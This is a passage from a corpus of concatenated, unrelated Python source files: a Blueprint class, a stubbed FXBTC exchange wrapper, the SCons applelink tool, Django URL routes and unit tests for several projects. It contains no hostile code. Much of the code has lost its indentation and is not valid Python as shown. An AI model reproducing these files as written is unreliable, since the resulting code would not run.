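#                "sample_vars": [], "default_vars": []}}
#
# Unknown message types, or anything received before server_init, raise
# InvalidMessage, which is caught and logged rather than propagated.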
| 6366295/ManyMan-for-mgsim | messageprocessor.py | Python | gpl-3.0 | 8,035 |
# -*- coding: utf-8 -*-
"""
Blueprints are the recommended way to implement larger or more
pluggable applications.
"""
from functools import update_wrapper
class Blueprint(object):
"""Represents a blueprint.
"""
def __init__(self, name, url_prefix=None, url_defaults=None):
self.app = None
self.name = name
self.url_prefix = url_prefix
self.deferred_functions = []
self.view_functions = {}
self.url_defaults = url_defaults or {}
self.register_options = {}
def record(self, func):
"""Registers a function that is called when the blueprint is
registered on the application. This function is called with the
state as argument as returned by the `make_setup_state`
method.
"""
if self.app:
from warnings import warn
warn('The blueprint was already registered once '
'but is getting modified now. These changes '
'will not show up.')
self.deferred_functions.append(func)
def register(self, app, options):
"""Called by `Cocopot.register_blueprint` to register a blueprint
on the application. This can be overridden to customize the register
behavior. Keyword arguments from
`~cocopot.Cocopot.register_blueprint` are directly forwarded to this
method in the `options` dictionary.
"""
self.app = app
self.register_options = options or {}
for deferred in self.deferred_functions:
deferred(self)
def route(self, rule, **options):
"""Like `Cocopot.route` but for a blueprint.
"""
def decorator(f):
endpoint = options.pop("endpoint", f.__name__)
self.add_url_rule(rule, endpoint, f, **options)
return f
return decorator
def add_url_rule(self, rule, endpoint=None, view_func=None, **options):
"""Like `Cocopot.add_url_rule` but for a blueprint.
"""
if endpoint:
            assert '.' not in endpoint, "Blueprint endpoints should not contain dots"
self.record(lambda s:
s.app_add_url_rule(rule, endpoint, view_func, **options))
def app_add_url_rule(self, rule, endpoint=None, view_func=None, **options):
"""A helper method to register a rule (and optionally a view function)
to the application. The endpoint is automatically prefixed with the
blueprint's name.
"""
url_prefix = self.register_options.get('url_prefix') or self.url_prefix
if url_prefix:
rule = url_prefix + rule
if endpoint is None:
endpoint = view_func.__name__
defaults = self.url_defaults
if 'defaults' in options:
defaults = dict(defaults, **options.pop('defaults'))
self.app.add_url_rule(rule, '%s.%s' % (self.name, endpoint),
view_func, defaults=defaults, **options)
def endpoint(self, endpoint):
"""Like `Cocopot.endpoint` but for a blueprint. This does not
        prefix the endpoint with the blueprint name; this has to be done
explicitly by the user of this method. If the endpoint is prefixed
with a `.` it will be registered to the current blueprint, otherwise
it's an application independent endpoint.
"""
def decorator(f):
def register_endpoint(self):
self.app.view_functions['%s.%s' % (self.name, endpoint)] = f
self.record(register_endpoint)
return f
return decorator
def before_request(self, f):
"""Like `Cocopot.before_request` but for a blueprint. This function
is only executed before each request that is handled by a function of
that blueprint.
"""
self.record(lambda s: s.app.before_request_funcs
.setdefault(self.name, []).append(f))
return f
def before_app_request(self, f):
"""Like `Cocopot.before_request`. Such a function is executed
before each request, even if outside of a blueprint.
"""
self.record(lambda s: s.app.before_request_funcs
.setdefault(None, []).append(f))
return f
def after_request(self, f):
"""Like `Cocopot.after_request` but for a blueprint. This function
is only executed after each request that is handled by a function of
that blueprint.
"""
self.record(lambda s: s.app.after_request_funcs
.setdefault(self.name, []).append(f))
return f
def after_app_request(self, f):
"""Like `Cocopot.after_request` but for a blueprint. Such a function
is executed after each request, even if outside of the blueprint.
"""
self.record(lambda s: s.app.after_request_funcs
.setdefault(None, []).append(f))
return f
def teardown_request(self, f):
"""Like `Cocopot.teardown_request` but for a blueprint. This
function is only executed when tearing down requests handled by a
function of that blueprint. Teardown request functions are executed
when the request context is popped, even when no actual request was
performed.
"""
self.record(lambda s: s.app.teardown_request_funcs
.setdefault(self.name, []).append(f))
return f
def teardown_app_request(self, f):
"""Like `Cocopot.teardown_request` but for a blueprint. Such a
function is executed when tearing down each request, even if outside of
the blueprint.
"""
self.record(lambda s: s.app.teardown_request_funcs
.setdefault(None, []).append(f))
return f
def app_errorhandler(self, code):
"""Like `Cocopot.errorhandler` but for a blueprint. This
handler is used for all requests, even if outside of the blueprint.
"""
def decorator(f):
self.record(lambda s: s.app.errorhandler(code)(f))
return f
return decorator
def errorhandler(self, code_or_exception):
"""Registers an error handler that becomes active for this blueprint
        only. Please be aware that routing does not happen locally to a
blueprint so an error handler for 404 usually is not handled by
a blueprint unless it is caused inside a view function. Another
special case is the 500 internal server error which is always looked
up from the application.
Otherwise works as the `Cocopot.errorhandler` decorator
of the `Cocopot` object.
"""
def decorator(f):
self.record(lambda s: s.app._register_error_handler(
self.name, code_or_exception, f))
return f
return decorator
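# --- Editor's note: illustrative sketch, not part of the original module. ---
# Declaring a blueprint and recording a route on it; "app" below stands in
# for a Cocopot application instance and is only referenced in comments.
_example_bp = Blueprint('admin', url_prefix='/admin')


@_example_bp.route('/status')
def _example_status():
    return 'ok'

# The deferred registration above only takes effect once the blueprint is
# attached to an application, e.g. app.register_blueprint(_example_bp).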
| zeaphoo/cocopot | cocopot/blueprints.py | Python | mit | 6,866 |
# exchange class for FXBTC - I expect that there will be more arb opportunities
# since Chinese and US markets are fundamentally mispriced.
# NOTE: all rates and currencies multiplied by 10^8 to avoid floating point!
# this will be a very important consideration
from Exchange import Exchange
from fxbtc import fx
from myutils import get_swapped_order
from order import Order
class FXBTC(Exchange):
def __init__(self, api_key, secret):
# self.api = fx(api_key, secret)
super(FXBTC, self).__init__()
self.name = 'FXBTC'
self.trading_fee = 0.002 # TODO - check this
self.marketids = {}
def get_tradeable_pairs(self):
pass
# tradeable_pairs = []
# self.pairIDs = {} # also initialize pairID reference while we're at it
# trade_pairs = self.api.get_trade_pairs()
# for pair in trade_pairs["trade_pairs"]:
# pairID = str(pair["id"])
# currencies = pair["url_slug"].split("_")
# base = currencies[0].upper()
# alt = currencies[1].upper()
# tradeable_pairs.append((base, alt))
# slug = base + "_" + alt
# self.pairIDs[slug] = pairID
# return tradeable_pairs
def get_depth(self, base, alt):
pass
# """
# coinEx does not support retrieving all depths! GRRRR
# TODO - need to also append orderID!!!
# """
# pair0 = (base, alt)
# pair, swapped = self.get_validated_pair(pair0)
# newbase, newalt = pair
# pairID = self.get_pairID(newbase, newalt)
# orders = self.api.get_orders(pairID)
# book = { "bids" : [], "asks" : [] }
# for data in orders["orders"]:
# if not data["complete"]:
# price = float(data["rate"]*1e-8)
# volume = float(data["amount"]*1e-8)
# order = Order(price, volume, orderID=data['id'], timestamp=data['created_at'])
# if not swapped:
# if data['bid']: # buy order
# book['bids'].append(order)
# else: # sell order
# book['asks'].append(order)
# else: # is swapped
# order = get_swapped_order(order)
# if data['bid']:
# book['asks'].append(order)
# else:
# book['bids'].append(order)
#
# return book
def get_balance(self, currency):
pass
# '''
# warning: dont call this too often.
# use get_all_balances instead
# '''
# balances = self.api.get_balances()
# for c in balances["balances"]:
# if currency == c["currency_name"]:
# return c["amount"] * 1e-8
# return 0.0
def get_all_balances(self):
pass
# data = self.api.get_balances()
# balances = {c["currency_name"] : c["amount"]*1e-8 for c in data['balances']}
# return balances
def submit_order(self, gc, gv, rc, rv):
return NotImplemented
# pair0 = (gc, rc)
# pair, swapped = self.get_validated_pair(pair0)
# newbase, newalt = pair
# pairID = self.get_pairID(newbase, newalt)
# TODO, do maths here
# self.api.submit_order(self, pairID, amount, order_type, rate)
def confirm_order(self, orderID):
pass
#data = self.api.get_order_status(orderID)
# TODO
# borrowed from Cryptsy API
def get_pairID(self, base, alt):
pass
# if (base, alt) in self.tradeable_pairs:
# slug = base + "_" + alt
# return self.pairIDs[slug]
# elif (alt, base) in self.tradeable_pairs:
# slug = alt + "_" + base
# return self.pairIDs[slug]
# else:
# return 'ERROR!'
| ericjang/cryptocurrency_arbitrage | FXBTC.py | Python | gpl-3.0 | 3,903 |
"""SCons.Tool.applelink
Tool-specific initialization for the Apple gnu-like linker.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001 - 2014 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/applelink.py 2014/07/05 09:42:21 garyo"
import SCons.Util
# Even though the Mac is based on the GNU toolchain, it doesn't understand
# the -rpath option, so we use the "link" tool instead of "gnulink".
import link
def generate(env):
"""Add Builders and construction variables for applelink to an
Environment."""
link.generate(env)
env['FRAMEWORKPATHPREFIX'] = '-F'
env['_FRAMEWORKPATH'] = '${_concat(FRAMEWORKPATHPREFIX, FRAMEWORKPATH, "", __env__)}'
env['_FRAMEWORKS'] = '${_concat("-framework ", FRAMEWORKS, "", __env__)}'
env['LINKCOM'] = env['LINKCOM'] + ' $_FRAMEWORKPATH $_FRAMEWORKS $FRAMEWORKSFLAGS'
env['SHLINKFLAGS'] = SCons.Util.CLVar('$LINKFLAGS -dynamiclib')
env['SHLINKCOM'] = env['SHLINKCOM'] + ' $_FRAMEWORKPATH $_FRAMEWORKS $FRAMEWORKSFLAGS'
# override the default for loadable modules, which are different
# on OS X than dynamic shared libs. echoing what XCode does for
# pre/suffixes:
env['LDMODULEPREFIX'] = ''
env['LDMODULESUFFIX'] = ''
env['LDMODULEFLAGS'] = SCons.Util.CLVar('$LINKFLAGS -bundle')
env['LDMODULECOM'] = '$LDMODULE -o ${TARGET} $LDMODULEFLAGS $SOURCES $_LIBDIRFLAGS $_LIBFLAGS $_FRAMEWORKPATH $_FRAMEWORKS $FRAMEWORKSFLAGS'
def exists(env):
return env['PLATFORM'] == 'darwin'
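# Editor's note: an illustrative SConstruct fragment, not part of this tool
# file; the target and source names are hypothetical. The tool is normally
# selected automatically on darwin, but can be requested explicitly:
#
#   env = Environment(tools=['default', 'applelink'])
#   env.SharedLibrary('mylib', ['mylib.c'])        # uses SHLINKFLAGS -dynamiclib
#   env.LoadableModule('myplugin', ['myplugin.c']) # uses LDMODULEFLAGS -bundle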
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| fluxer/spm | nuitka/nuitka/build/inline_copy/lib/scons-2.3.2/SCons/Tool/applelink.py | Python | gpl-2.0 | 2,796 |
from django.conf.urls import url, include
from django.urls import path
from django.utils.translation import pgettext_lazy
from django.views.generic.base import RedirectView
from ..views import (
delete_draft, claim_draft,
ListRequestView, UserRequestFeedView,
user_calendar
)
from ..filters import FOIREQUEST_FILTERS
STATUS_URLS = [str(x[0]) for x in FOIREQUEST_FILTERS]
urlpatterns = [
# Old feed URL
url(pgettext_lazy('url part', r'^latest/feed/$'),
RedirectView.as_view(pattern_name='foirequest-list_feed_atom', permanent=True),
name='foirequest-feed_latest_atom'),
url(pgettext_lazy('url part', r'^latest/rss/$'),
RedirectView.as_view(pattern_name='foirequest-list_feed', permanent=True),
name='foirequest-feed_latest'),
url(r'^delete-draft$', delete_draft, name='foirequest-delete_draft'),
path('claim/<uuid:token>/', claim_draft, name='foirequest-claim_draft'),
]
foirequest_urls = [
url(r'^$', ListRequestView.as_view(), name='foirequest-list'),
url(r'^feed/$', ListRequestView.as_view(feed='atom'), name='foirequest-list_feed_atom'),
url(r'^rss/$', ListRequestView.as_view(feed='rss'), name='foirequest-list_feed'),
# Translators: part in request filter URL
url(pgettext_lazy('url part', r'^topic/(?P<category>[-\w]+)/$'),
ListRequestView.as_view(), name='foirequest-list'),
url(pgettext_lazy('url part', r'^topic/(?P<category>[-\w]+)/feed/$'),
ListRequestView.as_view(feed='atom'), name='foirequest-list_feed_atom'),
url(pgettext_lazy('url part', r'^topic/(?P<category>[-\w]+)/rss/$'),
ListRequestView.as_view(feed='rss'), name='foirequest-list_feed'),
# # Translators: part in request filter URL
url(pgettext_lazy('url part', r'^tag/(?P<tag>[-\w]+)/$'),
ListRequestView.as_view(), name='foirequest-list'),
url(pgettext_lazy('url part', r'^tag/(?P<tag>[-\w]+)/feed/$'),
ListRequestView.as_view(feed='atom'), name='foirequest-list_feed_atom'),
url(pgettext_lazy('url part', r'^tag/(?P<tag>[-\w]+)/rss/$'),
ListRequestView.as_view(feed='rss'), name='foirequest-list_feed'),
# # Translators: part in request filter URL
url(pgettext_lazy('url part', r'^to/(?P<publicbody>[-\w]+)/$'),
ListRequestView.as_view(), name='foirequest-list'),
url(pgettext_lazy('url part', r'^to/(?P<publicbody>[-\w]+)/feed/$'),
ListRequestView.as_view(feed='atom'), name='foirequest-list_feed_atom'),
url(pgettext_lazy('url part', r'^to/(?P<publicbody>[-\w]+)/rss/$'),
ListRequestView.as_view(feed='rss'), name='foirequest-list_feed'),
url(pgettext_lazy('url part', r'^token/(?P<token>[-\w]+)/feed/$'),
UserRequestFeedView.as_view(feed='atom'), name='foirequest-user_list_feed_atom'),
url(pgettext_lazy('url part', r'^token/(?P<token>[-\w]+)/rss/$'),
UserRequestFeedView.as_view(feed='rss'), name='foirequest-user_list_feed'),
url(pgettext_lazy('url part', r'^token/(?P<token>[-\w]+)/calendar/$'),
user_calendar, name='foirequest-user_ical_calendar'),
] + [url(r'^(?P<status>%s)/$' % status, ListRequestView.as_view(),
name='foirequest-list')
for status in STATUS_URLS
] + [url(r'^(?P<status>%s)/feed/$' % status,
ListRequestView.as_view(feed='atom'), name='foirequest-list_feed_atom')
for status in STATUS_URLS
] + [url(r'^(?P<status>%s)/rss/$' % status,
ListRequestView.as_view(feed='rss'), name='foirequest-list_feed')
for status in STATUS_URLS
]
urlpatterns += foirequest_urls
urlpatterns += [
url(r'^(?P<jurisdiction>[-\w]+)/', include(foirequest_urls))
]
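# Editor's note: illustrative sketch, not part of the original file. The named
# patterns above resolve with Django's reverse(); slug values are made up:
#
#   reverse('foirequest-list')
#   reverse('foirequest-list', kwargs={'category': 'environment'})
#   reverse('foirequest-list_feed', kwargs={'status': STATUS_URLS[0]})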
| stefanw/froide | froide/foirequest/urls/list_requests_urls.py | Python | mit | 3,643 |
#!/usr/bin/env python
# ----------------------------------------------------------------------------
# Copyright (c) 2014--, tax-credit development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from unittest import TestCase, main
from shutil import rmtree
from os import makedirs
from tempfile import mkdtemp
from os.path import join, exists
from tax_credit.simulated_communities import (generate_simulated_communities)
class EvalFrameworkTests(TestCase):
@classmethod
def setUpClass(cls):
_table1 = '\n'.join([
'#SampleID\tk__Bacteria; p__Proteobacteria; c__Gammaproteobacteria'
'; o__Legionellales; f__Legionellaceae; g__Legionella; s__\t'
'k__Bacteria; p__Bacteroidetes; c__Flavobacteriia; o__Flavobacter'
'iales; f__Flavobacteriaceae; g__Flavobacterium; s__',
's1\t0.5\t0.5',
's2\t0.1\t0.9'])
cls.table2 = '\n'.join(['#SampleID\t0001\t0003',
's1\t0.5\t0.5',
's2\t0.1\t0.9\n'])
_ref1 = '\n'.join([
'0001\tk__Bacteria; p__Proteobacteria; c__Gammaproteobacteria; '
'o__Legionellales; f__Legionellaceae; g__Legionella; s__',
'0003\tk__Bacteria; p__Bacteroidetes; c__Flavobacteriia; o__Flavo'
'bacteriales; f__Flavobacteriaceae; g__Flavobacterium; s__'])
cls.seqs1 = '\n'.join(['>0001',
'ACTAGTAGTTGAC',
'>0003',
'ATCGATGCATGCA\n'])
cls.tmpdir = mkdtemp()
testdir = join(cls.tmpdir, 'sim_test')
comm_dir = 'blob'
cls.testpath = join(testdir, comm_dir)
if not exists(cls.testpath):
makedirs(cls.testpath)
tab_fp = join(cls.testpath, 'expected-composition.txt')
with open(tab_fp, 'w') as out:
out.write(_table1)
ref_fp = join(cls.testpath, 'ref1.tmp')
with open(ref_fp, 'w') as out:
out.write(_ref1)
seqs_fp = join(cls.testpath, 'seqs1.tmp')
with open(seqs_fp, 'w') as out:
out.write(cls.seqs1)
refs = {'ref1': (seqs_fp, ref_fp)}
generate_simulated_communities(testdir, [(comm_dir, 'ref1')], refs, 1)
def test_generate_simulated_communities(self):
with open(join(self.testpath, 'simulated-composition.txt'), 'r') as sc:
self.assertEqual(sc.read(), self.table2)
with open(join(self.testpath, 'simulated-seqs.fna'), 'r') as sq:
self.assertEqual(sq.read(), self.seqs1)
@classmethod
def tearDownClass(cls):
rmtree(cls.tmpdir)
if __name__ == "__main__":
main()
| caporaso-lab/short-read-tax-assignment | tax_credit/tests/test_simulated_communities.py | Python | bsd-3-clause | 2,885 |
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests model architecture functions."""
import tensorflow as tf
from poem.cv_mim import models
class ModelsTest(tf.test.TestCase):
def test_simple_point_embedder_shapes(self):
input_features = tf.zeros([4, 6], tf.float32)
model = models.SimpleModel(
output_shape=(4, 3),
embedder=models.TYPE_EMBEDDER_POINT,
hidden_dim=1024,
num_residual_linear_blocks=2,
num_layers_per_block=2)
outputs = model(input_features)
self.assertAllEqual(outputs[0].shape, [4, 4, 3])
self.assertAllEqual(outputs[1]['flatten'].shape, [4, 6])
self.assertAllEqual(outputs[1]['fc0'].shape, [4, 1024])
self.assertAllEqual(outputs[1]['res_fcs1'].shape, [4, 1024])
self.assertAllEqual(outputs[1]['res_fcs2'].shape, [4, 1024])
self.assertAllEqual(outputs[1]['embedder'].shape, [4, 4, 3])
def test_simple_point_embedder_forward_pass(self):
input_features = tf.constant([[1.0, 2.0, 3.0]])
model = models.SimpleModel(
output_shape=(4,),
embedder=models.TYPE_EMBEDDER_GAUSSIAN,
hidden_dim=2,
num_residual_linear_blocks=3,
num_layers_per_block=2,
use_batch_norm=False,
weight_initializer='ones')
outputs = model(input_features)
self.assertAllClose(outputs[0], [[1937.0, 1937.0, 1937.0, 1937.0]])
def test_simple_gaussian_embedder_shapes(self):
input_features = tf.zeros([4, 6], tf.float32)
model = models.SimpleModel(
output_shape=(4,),
embedder=models.TYPE_EMBEDDER_GAUSSIAN,
hidden_dim=1024,
num_residual_linear_blocks=2,
num_layers_per_block=2)
outputs = model(input_features)
self.assertAllEqual(outputs[0].shape, [4, 4])
self.assertAllEqual(outputs[1]['flatten'].shape, [4, 6])
self.assertAllEqual(outputs[1]['fc0'].shape, [4, 1024])
self.assertAllEqual(outputs[1]['res_fcs1'].shape, [4, 1024])
self.assertAllEqual(outputs[1]['res_fcs2'].shape, [4, 1024])
self.assertAllEqual(outputs[1]['embedder'].shape, [4, 4])
def test_simple_gaussian_embedder(self):
input_features = tf.ones([1, 6], tf.float32)
model = models.SimpleModel(
output_shape=(1,),
embedder=models.TYPE_EMBEDDER_GAUSSIAN,
hidden_dim=1024,
num_residual_linear_blocks=2,
num_layers_per_block=2,
weight_initializer='ones')
tf.random.set_seed(0)
outputs_x = model(input_features, training=True)
outputs_y = model(input_features, training=True)
self.assertNotAllEqual(outputs_x[0], outputs_y[0])
outputs_x = model(input_features, training=False)
outputs_y = model(input_features, training=False)
self.assertAllEqual(outputs_x[0], outputs_y[0])
def test_semgcn_shapes(self):
input_features = tf.zeros([4, 8, 2], tf.float32)
model = models.GCN(
output_dim=3,
affinity_matrix=tf.ones(shape=(8, 8)),
gconv_class=models.SemGraphConv,
hidden_dim=128,
num_residual_gconv_blocks=2,
num_layers_per_block=2)
outputs = model(input_features)
self.assertAllEqual(outputs[0].shape, [4, 8, 3])
self.assertAllEqual(outputs[1]['gconv0'].shape, [4, 8, 128])
self.assertAllEqual(outputs[1]['res_gconvs1'].shape, [4, 8, 128])
self.assertAllEqual(outputs[1]['res_gconvs2'].shape, [4, 8, 128])
self.assertAllEqual(outputs[1]['gconv3'].shape, [4, 8, 3])
def test_semgcn_forward_pass(self):
input_features = tf.constant([1.0, 2.0, 3.0], dtype=tf.float32)
input_features = tf.reshape(input_features, [1, 3, 1])
model = models.GCN(
output_dim=1,
affinity_matrix=tf.ones(shape=(3, 3)),
gconv_class=models.SemGraphConv,
hidden_dim=2,
num_residual_gconv_blocks=2,
num_layers_per_block=2,
use_batch_norm=False,
dropout_rate=0.0,
kernel_initializer='ones',
bias_initializer='zeros')
outputs, _ = model(input_features)
self.assertAllEqual(outputs.shape, [1, 3, 1])
self.assertAllClose(outputs, tf.reshape([100.0, 100.0, 100.0], [1, 3, 1]))
def test_likelihood_estimator_shapes(self):
input_features = tf.zeros([4, 6], tf.float32)
model = models.LikelihoodEstimator(output_dim=2)
outputs = model(input_features)
self.assertAllEqual(outputs[0].shape, [4, 2])
self.assertAllEqual(outputs[1].shape, [4, 2])
if __name__ == '__main__':
tf.test.main()
| google-research/google-research | poem/cv_mim/models_test.py | Python | apache-2.0 | 5,000 |
from django.contrib.auth.models import User
from django.contrib.sessions.backends.base import SessionBase
from django.test import TestCase
from django.test.client import RequestFactory
from uwsgi_it_api.views import *
from uwsgi_it_api.views_metrics import *
from uwsgi_it_api.views_private import *
import base64
import datetime
import json
class FakeSession(SessionBase):
def create(self):
return
def delete(self, key=None):
return
class ViewsTest(TestCase):
def setUp(self):
self.user = User.objects.create_user(
username='test', email='test@uwsgi.it', password='top_secret')
self.basic_auth = 'basic %s' % (base64.b64encode('test:top_secret'))
self.server_address = "10.0.0.1"
# customer api
self.server, _ = Server.objects.get_or_create(
name="server",
address=self.server_address,
hd="hd",
memory=100,
storage=100
)
self.customer, _ = Customer.objects.get_or_create(user=self.user)
self.container, _ = Container.objects.get_or_create(
customer=self.customer,
server=self.server,
memory=10,
storage=10,
name="container"
)
self.container2, _ = Container.objects.get_or_create(
customer=self.customer,
server=self.server,
memory=10,
storage=10,
name="container2"
)
self.c_uid = self.container.uid
self.domain, _ = Domain.objects.get_or_create(customer=self.customer, name="domain")
self.d_uuid = self.domain.uuid
self.tag, _ = Tag.objects.get_or_create(customer=self.customer, name="tag")
self.loopbox, _ = Loopbox.objects.get_or_create(container=self.container, filename='filename', mountpoint='mountpoint')
self.loopbox2, _ = Loopbox.objects.get_or_create(container=self.container2, filename='filename2', mountpoint='mountpoint2')
self.loopbox3, _ = Loopbox.objects.get_or_create(container=self.container, filename='filename3', mountpoint='mountpoint3')
self.l_id = self.loopbox.id
self.l2_id = self.loopbox2.id
self.l3_id = self.loopbox3.id
self.container.tags.add(self.tag)
self.domain.tags.add(self.tag)
self.loopbox.tags.add(self.tag)
self.loopbox2.tags.add(self.tag)
self.alarms = []
for i in range(0, 10):
a = Alarm(container=self.container, msg='test', level=1, unix=datetime.datetime.now())
a.save()
self.alarms.append(a)
# metrics
today = datetime.datetime.today()
NetworkRXContainerMetric.objects.create(
container=self.container,
year=today.year,
month=today.month,
day=today.day,
)
NetworkTXContainerMetric.objects.create(
container=self.container,
year=today.year,
month=today.month,
day=today.day,
)
CPUContainerMetric.objects.create(
container=self.container,
year=today.year,
month=today.month,
day=today.day,
)
MemoryContainerMetric.objects.create(
container=self.container,
year=today.year,
month=today.month,
day=today.day,
)
IOReadContainerMetric.objects.create(
container=self.container,
year=today.year,
month=today.month,
day=today.day,
)
IOWriteContainerMetric.objects.create(
container=self.container,
year=today.year,
month=today.month,
day=today.day,
)
QuotaContainerMetric.objects.create(
container=self.container,
year=today.year,
month=today.month,
day=today.day,
)
HitsDomainMetric.objects.create(
domain=self.domain,
container=self.container,
year=today.year,
month=today.month,
day=today.day,
)
NetworkRXDomainMetric.objects.create(
domain=self.domain,
container=self.container,
year=today.year,
month=today.month,
day=today.day,
)
NetworkTXDomainMetric.objects.create(
domain=self.domain,
container=self.container,
year=today.year,
month=today.month,
day=today.day,
)
self.factory = RequestFactory()
def logged_get_response_for_view(self, path, view, kwargs=None, params={}):
headers = {
'HTTP_AUTHORIZATION': self.basic_auth,
'HTTPS_DN': 'hithere',
'REMOTE_ADDR': self.server_address,
}
request = self.factory.get(path, params, **headers)
request.user = self.user
request.session = FakeSession()
if kwargs is None:
kwargs = {}
return view(request, **kwargs)
class ApiTest(ViewsTest):
def test_me(self):
response = self.logged_get_response_for_view('/me', me)
self.assertEqual(response.status_code, 200)
def test_me_containers(self):
response = self.logged_get_response_for_view('/me/containers', containers)
self.assertEqual(response.status_code, 200)
def test_containers(self):
response = self.logged_get_response_for_view('/containers', containers)
self.assertEqual(response.status_code, 200)
def test_containers_filters_tags(self):
response = self.logged_get_response_for_view('/containers', containers, params={'tags': 'tag'})
self.assertEqual(response.status_code, 200)
self.assertContains(response, '"uid": {}'.format(self.c_uid))
response = self.logged_get_response_for_view('/containers', containers, params={'tags': 'fail'})
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, '"uid": {}'.format(self.c_uid))
def test_container(self):
response = self.logged_get_response_for_view('/containers/1', container, {'id': self.c_uid})
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'alarm_freq')
def test_distros(self):
response = self.logged_get_response_for_view('/distros', distros)
self.assertEqual(response.status_code, 200)
def test_domains(self):
response = self.logged_get_response_for_view('/domains', domains)
self.assertEqual(response.status_code, 200)
def test_domains_filters_tags(self):
response = self.logged_get_response_for_view('/domains', domains, params={'tags': 'tag'})
self.assertEqual(response.status_code, 200)
self.assertContains(response, '"uuid": "{}"'.format(self.d_uuid))
response = self.logged_get_response_for_view('/domains', domains, params={'tags': 'fail'})
self.assertEqual(response.status_code, 200)
        self.assertNotContains(response, '"uuid": "{}"'.format(self.d_uuid))
def test_domain(self):
response = self.logged_get_response_for_view('/domains/1', domain, {'id': self.domain.pk})
self.assertEqual(response.status_code, 200)
def test_loopboxes(self):
response = self.logged_get_response_for_view('/loopboxes', loopboxes)
self.assertEqual(response.status_code, 200)
self.assertContains(response, '"id": {}'.format(self.l_id))
self.assertContains(response, '"id": {}'.format(self.l2_id))
self.assertContains(response, '"id": {}'.format(self.l3_id))
def test_loopboxes_filters_per_container(self):
response = self.logged_get_response_for_view('/loopboxes', loopboxes, params={'container': self.c_uid})
self.assertEqual(response.status_code, 200)
self.assertContains(response, '"id": {}'.format(self.l_id))
self.assertContains(response, '"id": {}'.format(self.l3_id))
self.assertNotContains(response, '"id": {}'.format(self.l2_id))
def test_loopboxes_filters_per_tag(self):
response = self.logged_get_response_for_view('/loopboxes', loopboxes, params={'tags': 'tag'})
self.assertEqual(response.status_code, 200)
self.assertContains(response, '"id": {}'.format(self.l_id))
self.assertContains(response, '"id": {}'.format(self.l2_id))
self.assertNotContains(response, '"id": {}'.format(self.l3_id))
def test_loopboxes_filters_per_tag_and_container(self):
response = self.logged_get_response_for_view('/loopboxes', loopboxes, params={'tags': 'tag', 'container': self.c_uid})
self.assertEqual(response.status_code, 200)
self.assertContains(response, '"id": {}'.format(self.l_id))
self.assertNotContains(response, '"id": {}'.format(self.l2_id))
self.assertNotContains(response, '"id": {}'.format(self.l3_id))
def test_loopbox(self):
response = self.logged_get_response_for_view('/loopboxes/{}'.format(self.l_id), loopbox, {'id': self.l_id})
self.assertEqual(response.status_code, 200)
self.assertContains(response, '"id": {}'.format(self.l_id))
def test_alarms_range(self):
response = self.logged_get_response_for_view('/alarms/', alarms, params={'range': '6'})
self.assertEqual(response.status_code, 200)
a = json.loads(response.content)
self.assertEqual(len(a), 6)
for i in range(0, 6):
self.assertEqual(a[i]['id'], self.alarms[9-i].id)
def test_alarms_range_throws_416(self):
response = self.logged_get_response_for_view('/alarms/', alarms, params={'range': '6-a'})
self.assertEqual(response.status_code, 416)
response = self.logged_get_response_for_view('/alarms/', alarms, params={'range': '6-'})
self.assertEqual(response.status_code, 416)
response = self.logged_get_response_for_view('/alarms/', alarms, params={'range': '-a'})
self.assertEqual(response.status_code, 416)
response = self.logged_get_response_for_view('/alarms/', alarms, params={'range': 'a'})
self.assertEqual(response.status_code, 416)
response = self.logged_get_response_for_view('/alarms/', alarms, params={'range': ''})
self.assertEqual(response.status_code, 416)
def test_alarms_range_between_two_values(self):
response = self.logged_get_response_for_view('/alarms/', alarms, params={'range': '3-6'})
self.assertEqual(response.status_code, 200)
a = json.loads(response.content)
self.assertEqual(len(a), 3)
for i in range(0, 3):
self.assertEqual(a[i]['id'], self.alarms[6-i].id)
def test_alarms_range_between_two_value_reversed(self):
response = self.logged_get_response_for_view('/alarms/', alarms, params={'range': '6-3'})
self.assertEqual(response.status_code, 200)
a = json.loads(response.content)
self.assertEqual(len(a), 3)
for i in range(0, 3):
self.assertEqual(a[i]['id'], self.alarms[3+i].id)
def test_tags(self):
response = self.logged_get_response_for_view('/tags', tags)
self.assertEqual(response.status_code, 200)
def test_tag(self):
response = self.logged_get_response_for_view('/tags/1', tag, {'id': self.tag.pk})
self.assertEqual(response.status_code, 200)
    def test_io_read(self):
        response = self.logged_get_response_for_view('/metrics/container.io.read/1', metrics_container_io_read, {'id': self.c_uid})
        self.assertEqual(response.status_code, 200)
def test_io_write(self):
response = self.logged_get_response_for_view('/metrics/container.io.write/1', metrics_container_io_write, {'id': self.c_uid})
